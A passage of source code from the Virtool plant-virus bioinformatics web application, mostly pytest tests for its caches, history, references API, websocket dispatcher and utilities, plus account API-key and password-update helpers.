assert cache_id == test_random_alphanumeric.last_choice
def test_create_legacy(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works when the `legacy` keyword argument is `True` instead of the default `False`.
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False, legacy=True)
assert dbs.caches.find_one() == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"legacy": True
}
assert cache_id == test_random_alphanumeric.last_choice
def test_create_program(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works with a non-default trimming program keyword argument
(trimmomatic-0.2.3 instead of skewer-0.2.2).
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False, program="trimmomatic-0.2.3")
assert dbs.caches.find_one({"_id": test_random_alphanumeric.last_choice}) == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"program": "trimmomatic-0.2.3"
}
assert cache_id == test_random_alphanumeric.last_choice
def test_create_duplicate(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function handles duplicate document ids smoothly. The function should retry with a new id.
"""
dbs.caches.insert_one({"_id": test_random_alphanumeric.next_choice[:8].lower()})
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False)
assert cache_id == "u3cuwaoq"
assert dbs.caches.find_one({"_id": test_random_alphanumeric.last_choice}) == {
**create_result,
"_id": test_random_alphanumeric.last_choice
}
@pytest.mark.parametrize("exists", [True, False])
async def test_get(exists, dbi):
"""
Test that the function returns a cache document when it exists and returns `None` when it does not.
"""
if exists:
await dbi.caches.insert_one({"_id": "foo"})
result = await virtool.caches.db.get(dbi, "foo")
if exists:
assert result == {"id": "foo"}
return
assert result is None
@pytest.mark.parametrize("exception", [False, True])
async def test_remove(exception, dbi):
app = {
"db": dbi,
"run_in_thread": make_mocked_coro(raise_exception=FileNotFoundError) if exception else make_mocked_coro(),
"settings": {
"data_path": "/foo"
}
}
await dbi.caches.insert_one({"_id": "baz"})
await virtool.caches.db.remove(app, "baz")
assert await dbi.caches.count() == 0
app["run_in_thread"].assert_called_with(
virtool.utils.rm,
"/foo/caches/baz",
True
)
```
#### File: tests/fixtures/jobs.py
```python
import pytest
@pytest.fixture
def test_job(static_time):
return {
"_id": "4c530449",
"user": {
"id": "igboyes"
},
"proc": 10,
"mem": 16,
"task": "build_index",
"args": {
"name": None,
"username": "igboyes",
"sample_id": "1e01a382",
"analysis_id": "e410429b",
"algorithm": "nuvs",
"index_id": "465428b0"
},
"status": [
{
"error": None,
"timestamp": static_time.datetime,
"state": "waiting",
"stage": None,
"progress": 0
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "running",
"stage": None,
"progress": 0
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "running",
"stage": "mk_analysis_dir",
"progress": 0.091
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "complete",
"stage": "import_results",
"progress": 1.0
}
]
}
```
#### File: tests/history/test_api.py
```python
import pytest
from operator import itemgetter
import virtool.otus.db
import virtool.otus.utils
import virtool.history.utils
async def test_find(spawn_client, test_changes, static_time):
"""
Test that a list of processed change documents are returned with a ``200`` status.
"""
client = await spawn_client(authorize=True)
await client.db.history.insert_many(test_changes)
resp = await client.get("/api/history")
assert resp.status == 200
resp_json = await resp.json()
resp_json["documents"] = sorted(resp_json["documents"], key=itemgetter("id"))
assert resp_json == {
"found_count": 3,
"page": 1,
"page_count": 1,
"per_page": 25,
"total_count": 3,
"documents": sorted([
{
"description": "Edited Prunus virus E",
"id": "6116cba1.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
},
{
"description": "Edited Prunus virus E",
"id": "foobar.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
},
{
"description": "Edited Prunus virus E",
"id": "foobar.2",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
}
], key=itemgetter("id"))
}
@pytest.mark.parametrize("error", [None, "404"])
async def test_get(error, resp_is, spawn_client, test_changes, static_time):
"""
Test that a specific history change can be retrieved by its change_id.
"""
client = await spawn_client(authorize=True)
await client.db.history.insert_many(test_changes)
change_id = "baz.1" if error else "6116cba1.1"
resp = await client.get("/api/history/" + change_id)
if error:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == {
"description": "Edited Prunus virus E",
"diff": [
["change", "abbreviation", ["PVF", ""]],
["change", "name", ["Prunus virus F", "Prunus virus E"]],
["change", "version", [0, 1]]
],
"id": "6116cba1.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
}
@pytest.mark.parametrize("error", [None, "404"])
@pytest.mark.parametrize("remove", [False, True])
async def test_revert(error, remove, create_mock_history, spawn_client, check_ref_right, resp_is):
"""
Test that a valid request results in a reversion and a ``204`` response.
"""
client = await spawn_client(authorize=True)
await create_mock_history(remove)
change_id = "foo.1" if error else "6116cba1.2"
resp = await client.delete("/api/history/" + change_id)
if error:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 204
assert await virtool.otus.db.join(client.db, "6116cba1") == {
"_id": "6116cba1",
"abbreviation": "TST",
"imported": True,
"isolates": [
{
"default": True,
"id": "cab8b360",
"sequences": [
{
"_id": "KX269872",
"definition": "Prunus virus F isolate 8816-s2 "
"segment RNA2 polyprotein 2 gene, "
"complete cds.",
"host": "sweet cherry",
"isolate_id": "cab8b360",
"sequence": "TGTTTAAGAGATTAAACAACCGCTTTC",
"otu_id": "6116cba1",
"segment": None
}
],
"source_name": "8816-v2",
"source_type": "isolate"
}
],
"reference": {
"id": "hxn167"
},
"last_indexed_version": 0,
"lower_name": "prunus virus f",
"name": "Prunus virus F",
"verified": False,
"schema": [],
"version": 1
}
```
#### File: tests/history/test_utils.py
```python
import pytest
import virtool.history.utils
def test_calculate_diff(test_otu_edit):
"""
Test that a diff is correctly calculated. Should work since the tested function is a very light wrapper for the
dict differ function.
"""
old, new = test_otu_edit
diff = virtool.history.utils.calculate_diff(old, new)
assert diff.sort() == [
("change", "name", ("Prunus virus F", "Prunus virus E")),
("change", "abbreviation", ("PVF", "")), ("change", "version", (0, 1))
].sort()
@pytest.mark.parametrize("document,description", [
# Name and abbreviation.
({
"name": "Tobacco mosaic virus",
"abbreviation": "TMV"
}, "Created Tobacco mosaic virus (TMV)"),
# Name only.
({
"name": "Tobacco mosaic virus",
"abbreviation": "",
}, "Created Tobacco mosaic virus")
])
def test_compose_create_description(document, description):
assert virtool.history.utils.compose_create_description(document) == description
@pytest.mark.parametrize("name,abbreviation,old_abbreviation,schema,description", [
# Only change name.
(
"Tobacco mosaic virus", None, "", None,
"Changed name to Tobacco mosaic virus"
),
# Change name and add an abbreviation where none was defined before.
(
"Tobacco mosaic virus", "TMV", "", None,
"Changed name to Tobacco mosaic virus and added abbreviation TMV"
),
# Change both name and abbreviation.
(
"Tobacco mosaic virus", "THG", "TMV", None,
"Changed name to Tobacco mosaic virus and changed abbreviation to THG"
),
# Change name and remove abbreviation.
(
"Tobacco mosaic virus", "", "TMV", None,
"Changed name to Tobacco mosaic virus and removed abbreviation TMV"
),
# Add an abbreviation where none was defined before.
(
None, "THG", "", None,
"Added abbreviation THG"
),
# Only change abbreviation.
(
None, "THG", "TMV", None,
"Changed abbreviation to THG"
),
# Only modify schema.
(
None, None, "", "schema",
"Modified schema"
),
# Modify schema and change name.
(
"Tobacco mosaic virus", None, "", "schema",
"Changed name to Tobacco mosaic virus and modified schema"
),
# Modify schema, change name, and add abbreviation
])
def test_compose_edit_description(name, abbreviation, old_abbreviation, schema, description):
assert virtool.history.utils.compose_edit_description(name, abbreviation, old_abbreviation, schema) == description
```
#### File: tests/references/test_api.py
```python
import pytest
from aiohttp.test_utils import make_mocked_coro
async def test_get_release(mocker, spawn_client, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_fetch_and_update_release = mocker.patch(
"virtool.references.db.fetch_and_update_release",
make_mocked_coro({
"_id": "release"
})
)
resp = await client.get("/api/refs/foo/release")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == {
"_id": "release"
}
m_fetch_and_update_release.assert_called_with(
client.app,
"foo"
)
@pytest.mark.parametrize("empty", [True, False])
async def test_list_updates(empty, mocker, spawn_client, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_get_one_field = mocker.patch(
"virtool.db.utils.get_one_field",
make_mocked_coro(None if empty else [
"a",
"b",
"c"
])
)
resp = await client.get("/api/refs/foo/updates")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == [] if None else [
"c",
"b",
"a"
]
m_get_one_field.assert_called_with(
client.db.references,
"updates",
"foo"
)
@pytest.mark.parametrize("error", [None, "400"])
async def test_update(error, mocker, spawn_client, check_ref_right, id_exists, resp_is, static_time):
client = await spawn_client(authorize=True)
if error != "400":
await client.db.references.insert_one({
"_id": "foo",
"release": {
"id": "bar"
}
})
m_process = mocker.patch("virtool.references.db.UpdateRemoteReferenceProcess")
m_register = mocker.patch(
"virtool.processes.db.register",
make_mocked_coro({
"id": "process"
})
)
m_spawn = mocker.patch("aiojobs.aiohttp.spawn", make_mocked_coro())
m_update = mocker.patch(
"virtool.references.db.update",
make_mocked_coro((
{
"id": "bar"
},
{
"id": "update",
"created_at": "time"
}
))
)
resp = await client.post("/api/refs/foo/updates")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
if error == "400":
assert await resp_is.bad_request(resp, "Target release does not exist")
return
m_register.assert_called_with(
client.db,
"update_remote_reference",
context={
"created_at": static_time.datetime,
"ref_id": "foo",
"release": {
"id": "bar"
},
"user_id": "test"
}
)
m_spawn.assert_called_with(
mocker.ANY,
m_process().run()
)
m_update.assert_called_with(
client.app,
static_time.datetime,
"process",
"foo",
{
"id": "bar"
},
"test"
)
assert resp.status == 201
assert await resp.json() == {
"id": "update",
"created_at": "time"
}
async def test_find_indexes(mocker, spawn_client, id_exists, md_proxy, resp_is):
client = await spawn_client(authorize=True)
body = {
"documents": ["a", "b", "c"]
}
m_find = mocker.patch("virtool.indexes.db.find", make_mocked_coro(body))
resp = await client.get("/api/refs/foo/indexes")
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == body
m_find.assert_called_with(
client.db,
md_proxy(),
ref_id="foo"
)
async def test_create(mocker, spawn_client, test_random_alphanumeric, static_time):
client = await spawn_client(authorize=True, permissions=["create_ref"])
default_source_type = [
"strain",
"isolate"
]
client.settings["default_source_types"] = default_source_type
data = {
"name": "Test Viruses",
"description": "A bunch of viruses used for testing",
"data_type": "genome",
"organism": "virus"
}
m_get_otu_count = mocker.patch("virtool.references.db.get_otu_count", make_mocked_coro(22))
m_get_unbuilt_count = mocker.patch("virtool.references.db.get_unbuilt_count", make_mocked_coro(5))
resp = await client.post("/api/refs", data)
assert resp.status == 201
assert resp.headers["Location"] == "/api/refs/" + test_random_alphanumeric.history[0]
assert await resp.json() == dict(
data,
id=test_random_alphanumeric.history[0],
created_at="2015-10-06T20:00:00Z",
user={
"id": "test"
},
users=[{
"build": True,
"id": "test",
"modify": True,
"modify_otu": True,
"remove": True
}],
groups=[],
contributors=[],
internal_control=None,
restrict_source_types=False,
otu_count=22,
unbuilt_change_count=5,
source_types=default_source_type,
latest_build=None
)
m_get_otu_count.assert_called_with(
client.db,
test_random_alphanumeric.history[0]
)
m_get_unbuilt_count.assert_called_with(
client.db,
test_random_alphanumeric.history[0]
)
@pytest.mark.parametrize("control_exists", [True, False])
@pytest.mark.parametrize("control_id", [None, "", "baz"])
async def test_edit(control_exists, control_id, mocker, spawn_client, check_ref_right, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_find_one_and_update = mocker.patch.object(
client.db.references,
"find_one_and_update",
make_mocked_coro({
"_id": "foo",
"name": "Test Reference"
})
)
m_get_computed = mocker.patch(
"virtool.references.db.get_computed",
make_mocked_coro({
"computed": True
})
)
m_get_internal_control = mocker.patch(
"virtool.references.db.get_internal_control",
make_mocked_coro({"id": "baz"} if control_exists else None)
)
data = {
"name": "Tester",
"description": "This is a test reference."
}
if control_id is not None:
data["internal_control"] = control_id
resp = await client.patch("/api/refs/foo", data)
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
check_ref_right.assert_called_with(
mocker.ANY,
"foo",
"modify"
)
assert check_ref_right.called_with_req()
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
expected_internal_control = None
if control_id and control_exists:
expected_internal_control = {
"id": "baz"
}
update = {
"description": "This is a test reference.",
"name": "Tester"
}
if control_id is not None:
update["internal_control"] = expected_internal_control
m_find_one_and_update.assert_called_with(
{
"_id": "foo"
},
{
"$set": update
}
)
m_get_computed.assert_called_with(
client.db,
"foo",
control_id
)
if control_id:
m_get_internal_control.assert_called_with(
client.db,
"baz",
"foo"
)
@pytest.mark.parametrize("error", [None, "400_dne", "400_exists", "404"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_add_group_or_user(error, field, spawn_client, check_ref_right, resp_is, static_time):
"""
Test that the group or user is added to the reference when no error condition exists.
Test for the following error conditions:
- 404: ref does not exist
- 400_exists: group or user already exists in ref
- 400_dne: group or user does not exist
"""
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
# Add group and user subdocuments to make sure a 400 is returned complaining about the user or group already
# existing in the ref.
if error == "400_exists":
document["groups"].append({
"id": "tech"
})
document["users"].append({
"id": "fred"
})
# Add group and user document to their collections unless we want to trigger a 400 complaining about the user or
# group already not existing.
if error != "400_dne":
await client.db.groups.insert_one({
"_id": "tech"
})
await client.db.users.insert_one({
"_id": "fred",
"identicon": "foo_identicon"
})
# Don't insert the ref document if we want to trigger a 404.
if error != "404":
await client.db.references.insert_one(document)
url = "/api/refs/foo/{}s".format(field)
resp = await client.post(url, {
field + "_id": "tech" if field == "group" else "fred",
"modify": True
})
if error == "404":
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
if error == "400_dne":
assert await resp_is.bad_request(resp, "{} does not exist".format(field.capitalize()))
return
if error == "400_exists":
assert await resp_is.bad_request(resp, "{} already exists".format(field.capitalize()))
return
assert resp.status == 201
expected = {
"id": "tech" if field == "group" else "fred",
"created_at": static_time.iso,
"build": False,
"modify": True,
"modify_otu": False,
"remove": False
}
if field == "user":
expected["identicon"] = "foo_identicon"
assert await resp.json() == expected
@pytest.mark.parametrize("error", [None, "404_field", "404_ref"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_edit_group_or_user(error, field, spawn_client, check_ref_right, resp_is):
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
if error != "404_field":
document["groups"].append({
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
document["users"].append({
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
if error != "404_ref":
await client.db.references.insert_one(document)
await client.db.users.insert_one({
"_id": "fred",
"identicon": "foo_identicon"
})
subdocument_id = "tech" if field == "group" else "fred"
url = "/api/refs/foo/{}s/{}".format(field, subdocument_id)
resp = await client.patch(url, {
"remove": True
})
if error:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 200
expected = {
"id": subdocument_id,
"build": False,
"modify": False,
"modify_otu": False,
"remove": True
}
if field == "user":
expected["identicon"] = "foo_identicon"
assert await resp.json() == expected
assert await client.db.references.find_one() == {
"_id": "foo",
"groups": [{
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": field == "group"
}],
"users": [{
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": field == "user"
}]
}
@pytest.mark.parametrize("error", [None, "404_field", "404_ref"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_delete_group_or_user(error, field, spawn_client, check_ref_right, resp_is):
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
if error != "404_field":
document["groups"].append({
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
document["users"].append({
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
if error != "404_ref":
await client.db.references.insert_one(document)
subdocument_id = "tech" if field == "group" else "fred"
url = "/api/refs/foo/{}s/{}".format(field, subdocument_id)
resp = await client.delete(url)
if error:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 204
if field == "group":
expected = {
**document,
"groups": []
}
else:
expected = {
**document,
"users": []
}
assert await client.db.references.find_one() == expected
```
#### File: virtool/tests/test_dispatcher.py
```python
import pytest
import virtool.api
from virtool.dispatcher import Dispatcher
class TestConnection:
def test_init(self, test_ws_connection):
"""
Test that :meth:`.Connection.__init__` draws attributes from the passed session and websocket handler.
"""
assert test_ws_connection.user_id == "test"
assert test_ws_connection.groups == ["admin", "test"]
assert test_ws_connection.permissions == ["create_sample"]
async def test_send(self, test_ws_connection):
await test_ws_connection.send({
"interface": "users",
"operation": "update",
"data": {
"user_id": "john",
"groups": []
}
})
assert test_ws_connection._ws.send_json.stub.call_args[0] == ({
'data': {
'groups': [],
'user_id': 'john'
},
'interface': 'users',
'operation': 'update'
}, virtool.api.dumps)
async def test_close(self, test_ws_connection):
await test_ws_connection.close()
assert test_ws_connection._ws.close.stub.called
def test_add_connection(mocker):
dispatcher = Dispatcher()
m = mocker.Mock()
dispatcher.add_connection(m)
assert m in dispatcher.connections
def test_remove_connection(mocker):
dispatcher = Dispatcher()
m = mocker.Mock()
dispatcher.add_connection(m)
assert m in dispatcher.connections
dispatcher.remove_connection(m)
assert dispatcher.connections == []
async def test_dispatch_authorized(create_test_connection):
"""
Test if an authorized connection can have a message dispatched through it using its ``send`` method.
"""
dispatcher = Dispatcher()
m = create_test_connection()
m.user_id = "test"
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True})
m.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
async def test_dispatch_unauthorized(create_test_connection):
"""
Test an unauthorized connections does not have its ``send`` method called during a dispatch.
"""
dispatcher = Dispatcher()
m = create_test_connection()
m.user_id = None
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True})
m.send_stub.assert_not_called()
async def test_dispatch_either(create_test_connection):
"""
Test the only the authorized connection has its ``send`` method called when an one authorized and one
unauthorized connection are managed by the dispatcher.
"""
dispatcher = Dispatcher()
m_authorized = create_test_connection()
m_authorized.user_id = "test"
m_unauthorized = create_test_connection()
m_unauthorized.user_id = None
dispatcher.add_connection(m_authorized)
dispatcher.add_connection(m_unauthorized)
await dispatcher.dispatch("otus", "update", {"test": True})
m_authorized.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_unauthorized.send_stub.assert_not_called()
async def test_dispatch_specific(create_test_connection):
"""
Test that only the connection passed in the keyword argument ``connections`` has its ``send`` method called when
a dispatch occurs.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
m_3 = create_test_connection()
m_3.user_id = "test"
for m in (m_1, m_2, m_3):
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True}, connections=[m_2])
m_1.send_stub.assert_not_called()
m_2.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_3.send_stub.assert_not_called()
async def test_callable_filter(create_test_connection):
"""
Test that the ``conn_filter`` keyword argument properly filters connections and dispatches to them.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
await dispatcher.dispatch("otus", "update", {"test": True}, conn_filter=lambda conn: conn.user_id == "bob")
m_1.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_2.send_stub.assert_not_called()
async def test_non_callable_filter():
"""
Test that that passing a non-callable ``conn_filter`` keyword argument raises a specific ``TypeError``.
"""
with pytest.raises(TypeError) as err:
await Dispatcher().dispatch("otus", "update", {"test": True}, conn_filter=True)
assert "conn_filter must be callable" in str(err.value)
async def test_callable_modifier(create_test_connection):
"""
Test that the ``conn_modifier`` keyword argument properly modifies connection objects.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
def apply_male(conn):
conn.groups = ["men"]
await dispatcher.dispatch("otus", "update", {"test": True}, conn_modifier=apply_male)
assert m_1.groups == ["men"]
assert m_2.groups == ["men"]
async def test_not_callable_modifier():
"""
Test that an non-callable ``conn_modifier`` raises a specific ``TypeError``.
"""
with pytest.raises(TypeError) as err:
await Dispatcher().dispatch("otus", "update", {"test": True}, conn_modifier="abc")
assert "conn_modifier must be callable" in str(err.value)
async def test_modifier_filter(create_test_connection):
"""
Test that the ``conn_modifier`` keyword argument only modifies connection objects that pass ``conn_filter``.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_1.groups = None
m_2 = create_test_connection()
m_2.user_id = "fred"
m_2.groups = None
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
def apply_male(conn):
conn.groups = ["men"]
await dispatcher.dispatch(
"otus", "update", {"test": True},
conn_filter=lambda conn: conn.user_id == "bob",
conn_modifier=apply_male
)
assert m_1.groups == ["men"]
assert m_2.groups is None
async def test_writer(create_test_connection):
"""
Test that a writer can properly modify and write a message to the passed connection.
"""
async def writer(connection, message):
if connection.user_id == "bob":
message["data"]["test"] = False
await connection.send(message)
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
await dispatcher.dispatch("otus", "update", {"test": True}, writer=writer)
m_1.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": False
}
})
m_2.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
async def test_writer_not_callable():
"""
Test that a writer can properly modify and write a message to the passed connection.
"""
with pytest.raises(TypeError) as excinfo:
await Dispatcher().dispatch("otus", "update", {"test": True}, writer="writer")
assert "writer must be callable" in str(excinfo.value)
```
#### File: virtool/tests/test_utils.py
```python
import datetime
import os
import shutil
import sys
import arrow
import pytest
import virtool.utils
@pytest.fixture
def fake_dir(tmpdir):
file_1 = tmpdir.join("hello.txt")
file_2 = tmpdir.join("world.txt")
file_1.write("hello world")
file_2.write("this is a test file")
return tmpdir
@pytest.fixture(scope="session")
def alphanumeric():
return "abcdefghijklmnopqrstuvwxyz1234567890"
@pytest.fixture(scope="function")
def randomizer():
source = ["abc123", "jkl932", "90r2ja", "87e9wa", "skk342", "skl1qq"]
def function():
return source.pop()
return function
@pytest.fixture(scope="function")
def collection():
return [
{
"id": 0,
"name": "lambert"
},
{
"id": 1,
"name": "winston"
},
{
"id": 2,
"name": "stuart"
},
]
def test_decompress_tgz(tmpdir):
path = str(tmpdir)
src_path = os.path.join(sys.path[0], "tests", "test_files", "virtool.tar.gz")
shutil.copy(src_path, path)
virtool.utils.decompress_tgz(os.path.join(path, "virtool.tar.gz"), os.path.join(path, "de"))
assert set(os.listdir(path)) == {"virtool.tar.gz", "de"}
assert os.listdir(os.path.join(path, "de")) == ["virtool"]
assert set(os.listdir(os.path.join(path, "de", "virtool"))) == {"run", "client", "VERSION", "install.sh"}
class TestRm:
def test_rm_file(self, fake_dir):
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt"}
path = os.path.join(str(fake_dir), "world.txt")
virtool.utils.rm(path)
assert set(os.listdir(str(fake_dir))) == {"hello.txt"}
def test_rm_folder(self, fake_dir):
fake_dir.mkdir("dummy")
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy"}
path = os.path.join(str(fake_dir), "dummy")
with pytest.raises(IsADirectoryError):
virtool.utils.rm(path)
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy"}
def test_rm_folder_recursive(self, fake_dir):
fake_dir.mkdir("dummy_recursive")
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy_recursive"}
path = os.path.join(str(fake_dir), "dummy_recursive")
virtool.utils.rm(path, recursive=True)
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt"}
def test_timestamp(mocker):
"""
Test that the timestamp util returns a datetime object with the last 3 digits of the microsecond frame set to
zero.
"""
m = mocker.Mock(return_value=arrow.Arrow(2017, 10, 6, 20, 0, 0, 612304))
mocker.patch("arrow.utcnow", new=m)
timestamp = virtool.utils.timestamp()
assert isinstance(timestamp, datetime.datetime)
assert timestamp == arrow.arrow.Arrow(2017, 10, 6, 20, 0, 0, 612000).naive
class TestRandomAlphanumeric:
def test_default(self, alphanumeric):
for _ in range(0, 10):
an = virtool.utils.random_alphanumeric()
assert len(an) == 6
assert all(l in alphanumeric for l in an)
def test_length(self, alphanumeric):
for length in [7, 10, 25, 12, 4, 22, 17, 30, 8, 14, 19]:
an = virtool.utils.random_alphanumeric(length)
assert len(an) == length
assert all(l in alphanumeric for l in an)
def test_excluded(self, alphanumeric):
for _ in range(0, 5):
an = virtool.utils.random_alphanumeric(excluded=["87e9wa"])
assert an != "87e9wa"
assert len(an) == 6
assert all(l in alphanumeric for l in an)
class TestAverageList:
def test_default(self):
list1 = [2, 5, 6, 10, 14, 20]
list2 = [-1, 3, 0, 22, 12, 11]
expected = [0.5, 4, 3, 16, 13, 15.5]
assert virtool.utils.average_list(list1, list2) == expected
def test_mismatched(self):
with pytest.raises(TypeError):
virtool.utils.average_list([1, 3, 2, 4], [2, 3, 7])
def test_wrong_item_type(self):
with pytest.raises(TypeError):
virtool.utils.average_list([2, 5, 6], [8, "a", 5])
def test_wrong_arg_type(self):
with pytest.raises(TypeError):
virtool.utils.average_list([2, 5, 6], "a")
```
#### File: virtool/account/db.py
```python
import virtool.account.utils
import virtool.db.core
import virtool.users.db
import virtool.users.utils
import virtool.utils
PROJECTION = [
"_id",
"administrator",
"email",
"groups",
"identicon",
"last_password_change",
"permissions",
"primary_group",
"settings"
]
def compose_password_update(user_id: str, old_password: str, password: str) -> dict:
"""
Compose an update dict for self-changing a users account password. This will disable forced reset and won't
invalidate current sessions, unlike a password change by an administrator.
:param user_id: the id of the user to be updated
:param old_password: the old password for authorization
:param password: the <PASSWORD>
:return: a password update
"""
# Update the user document. Remove all sessions so those clients will have to authenticate with the new
# password.
return {
"password": <PASSWORD>password(password),
"invalidate_sessions": False,
"last_password_change": virtool.utils.timestamp(),
"force_reset": False
}
async def get_alternate_id(db: virtool.db.core.DB, name: str) -> str:
"""
Get an alternate id for an API key whose provided `name` is not unique. Appends an integer suffix to the end of the
`name`.
:param db: the application database object
:param name: the API key name
:return: an alternate unique id for the key
"""
existing_alt_ids = await db.keys.distinct("id")
suffix = 0
while True:
candidate = f"{name.lower()}_{suffix}"
if candidate not in existing_alt_ids:
return candidate
suffix += 1
async def create_api_key(db: virtool.db.core.DB, name: str, permissions: dict, user_id: str):
"""
Create a new API key for the account with the given `user_id`.
API keys can only receive permissions possessed by the owner of the API key. If the owner is an administrator, their
key permissions will not be limited.
Actions that require administrator status cannot be performed using API key authentication.
:param db: the application database object
:param name: a display name for the API key
:param permissions: permissions to provide to the API key
:param user_id: the id of the owning user
:return: the API key document
"""
user = await db.users.find_one(user_id, ["administrator", "groups", "permissions"])
key_permissions = {
**virtool.users.utils.generate_base_permissions(),
**permissions
}
if not user["administrator"]:
key_permissions = virtool.users.utils.limit_permissions(key_permissions, user["permissions"])
raw, hashed = virtool.account.utils.generate_api_key()
document = {
"_id": hashed,
"id": await virtool.account.db.get_alternate_id(db, name),
"name": name,
"groups": user["groups"],
"permissions": key_permissions,
"created_at": virtool.utils.timestamp(),
"user": {
"id": user_id
}
}
await db.keys.insert_one(document)
del document["_id"]
del document["user"]
document["key"] = raw
return document
```
#### File: virtool/caches/api.py
```python
import virtool.analyses.utils
import virtool.caches.db
import virtool.users.db
import virtool.db.utils
import virtool.http.routes
import virtool.validators
import virtool.utils
from virtool.api import json_response, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/caches/{cache_id}")
async def get(req):
"""
Return the complete representation for the cache with the given `cache_id`.
"""
db = req.app["db"]
cache_id = req.match_info["cache_id"]
cache = await virtool.caches.db.get(db, cache_id)
if cache is None:
return not_found()
return json_response(cache)
```
#### File: virtool/virtool/config.py
```python
import argparse
import json
import logging
import os
import psutil
import sys
import urllib.parse
import cerberus
import pymongo
import virtool.settings.db
import virtool.db.utils
